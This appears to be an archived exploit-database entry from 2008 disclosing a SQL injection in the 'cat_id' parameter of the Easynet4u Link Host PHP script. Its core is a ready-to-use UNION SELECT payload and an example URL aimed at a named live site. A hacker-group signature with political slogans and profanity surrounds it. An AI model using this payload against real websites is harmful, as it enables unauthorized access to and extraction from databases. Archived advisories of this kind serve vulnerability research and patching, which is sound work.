Easynet4u Link Host - 'cat_id' SQL Injection

Author: BeyazKurt
type: webapps
platform: php
port: 
date_added: 2008-10-09  
date_updated: 2016-12-26  
verified: 1  
codes:   
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6728.txt  
#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
#
# Script : Easynet4u Link Host
# Script Site: http://www.easynet4u.com/linkdem.php
#
# SQL Injection Vuln. :
# Exploit : SITE.COM/[path]/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
#
# Example:
# http://www.easynet4u.com/homebusiness/directory.php?username=demo&ax=list&sub=51&cat_id=51+union+select+0,1,version(),database(),4/*
#
# -------------------------------
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                       Proud 2 Be MUSLIM !
#                      Proud 2 Be ALBANIAN !
#
# Bunuda yayinlamassn ebeni ...
#######################################################

# milw0rm.com [2008-10-10]